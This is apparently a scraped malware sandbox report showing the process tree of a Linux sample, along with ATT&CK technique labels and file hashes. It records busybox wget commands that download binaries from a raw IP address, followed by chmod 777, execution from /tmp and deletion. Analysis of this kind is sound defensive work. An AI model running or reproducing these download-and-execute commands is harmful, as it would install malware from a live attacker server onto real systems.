/bin/busybox/bin/busybox wget http://216.126.231.240/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:891
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:895
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97